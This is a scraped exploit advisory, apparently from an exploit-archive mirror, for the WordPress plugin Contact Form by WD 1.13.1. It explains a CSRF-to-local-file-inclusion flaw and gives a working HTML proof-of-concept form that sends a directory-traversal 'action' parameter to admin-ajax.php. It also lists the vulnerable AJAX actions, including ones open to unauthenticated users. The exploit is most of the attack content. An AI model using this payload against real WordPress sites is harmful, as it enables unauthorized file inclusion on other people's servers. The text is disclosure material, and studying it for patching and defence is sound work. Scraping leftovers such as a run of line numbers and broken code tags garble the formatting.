扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 |
# Exploit Title: Contact Form by WD [CSRF → LFI] # Date: 2019-03-17 # Exploit Author: Panagiotis Vagenas # Vendor Homepage: http://web-dorado.com/ # Software Link: https://wordpress.org/plugins/contact-form-maker # Version: 1.13.1 # Tested on: WordPress 5.1.1 Description ----------- Plugin implements the following AJAX actions: - <code>manage_fm - <code>get_stats - <code>generete_csv - <code>generete_xml - <code>formmakerwdcaptcha - <code>nopriv_formmakerwdcaptcha - <code>formmakerwdmathcaptcha - <code>nopriv_formmakerwdmathcaptcha - <code>product_option - <code>FormMakerEditCountryinPopup - <code>FormMakerMapEditinPopup - <code>FormMakerIpinfoinPopup - <code>show_matrix - <code>FormMakerSubmits - <code>FormMakerSQLMapping - <code>select_data_from_db - <code>manage All of them call the function <code>form_maker_ajax_fmc</code>. This function dynamicaly loads a file defined in <code>$_GET['action']</code> or $_POST['action']</code> if the former is not defined. Because of the way WordPress defines the AJAX action a user could define the plugin action in the <code>$_GET['action']</code> and AJAX action in <code>$_POST['action']</code>. Leveraging that and the fact that no sanitization is performed on the $_GET['action']</code>, a malicious actor can perform a CSRF attack to load a file using directory traversal thus leading to Local File Inclusion vulnerability. The following AJAX actions are available only for the paid version of the plugin: - <code>paypal_info - <code>checkpaypal - <code>nopriv_checkpaypal - <code>get_frontend_stats - <code>nopriv_get_frontend_stats - <code>frontend_show_map - <code>nopriv_frontend_show_map - <code>frontend_show_matrix - <code>nopriv_frontend_show_matrix - <code>frontend_paypal_info - <code>nopriv_frontend_paypal_info - <code>frontend_generate_csv - <code>nopriv_frontend_generate_csv - <code>frontend_generate_xml - <code>nopriv_frontend_generate_xml - <code>FMShortocde - <code>wd_bp_dismiss In both free and paid versions, there are no-privilege actions that can be exploited by unauthenticated users in order to include local files. PoC --- </code><code>html <form method="post" action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=../../../../../index.php"> <label>AJAX action: <select name="action"> <optgroup label="Free version"> <option value="FMShortocde_fmc">FMShortocde_fmc</option> <option value="FormMakerEditCountryinPopup_fmc">FormMakerEditCountryinPopup_fmc</option> <option value="FormMakerIpinfoinPopup_fmc">FormMakerIpinfoinPopup_fmc</option> <option value="FormMakerMapEditinPopup_fmc">FormMakerMapEditinPopup_fmc</option> <option value="FormMakerSQLMapping_fmc">FormMakerSQLMapping_fmc</option> <option value="FormMakerSubmits_fmc">FormMakerSubmits_fmc</option> <option value="formmakerwdcaptcha_fmc">formmakerwdcaptcha_fmc</option> <option value="formmakerwdmathcaptcha_fmc">formmakerwdmathcaptcha_fmc</option> <option value="frontend_show_matrix_fmc">frontend_show_matrix_fmc</option> <option value="generete_csv_fmc">generete_csv_fmc</option> <option value="generete_xml_fmc">generete_xml_fmc</option> <option value="get_stats_fmc">get_stats_fmc</option> <option value="manage_fmc">manage_fmc</option> <option value="manage_fm_fmc">manage_fm_fmc</option> <option value="nopriv_formmakerwdcaptcha_fmc">nopriv_formmakerwdcaptcha_fmc</option> <option value="nopriv_formmakerwdmathcaptcha_fmc">nopriv_formmakerwdmathcaptcha_fmc</option> <option value="product_option_fmc">product_option_fmc</option> <option value="select_data_from_db_fmc">select_data_from_db_fmc</option> <option value="wd_bp_dismiss_fmc">wd_bp_dismiss_fmc</option> </optgroup> <optgroup label="Pro Version"> <option value="paypal_info_fmc">paypal_info_fmc</option> <option value="checkpaypal_fmc">checkpaypal_fmc</option> <option value="nopriv_checkpaypal_fmc">nopriv_checkpaypal_fmc</option> <option value="nopriv_get_frontend_stats_fmc">nopriv_get_frontend_stats_fmc</option> <option value="get_frontend_stats_fmc">get_frontend_stats_fmc</option> <option value="frontend_show_map_fmc">frontend_show_map_fmc</option> <option value="nopriv_frontend_show_map_fmc">nopriv_frontend_show_map_fmc</option> <option value="show_matrix_fmc">show_matrix_fmc</option> <option value="nopriv_frontend_show_matrix_fmc">nopriv_frontend_show_matrix_fmc</option> <option value="frontend_paypal_info_fmc">frontend_paypal_info_fmc</option> <option value="nopriv_frontend_paypal_info_fmc">nopriv_frontend_paypal_info_fmc</option> <option value="frontend_generate_csv_fmc">frontend_generate_csv_fmc</option> <option value="nopriv_frontend_generate_csv_fmc">nopriv_frontend_generate_csv_fmc</option> <option value="frontend_generate_xml_fmc">frontend_generate_xml_fmc</option> <option value="nopriv_frontend_generate_xml_fmc">nopriv_frontend_generate_xml_fmc</option> </optgroup> </select> </label> <button type="submit" value="Submit">Submit</button> </form> </code><code> |
体验盒子
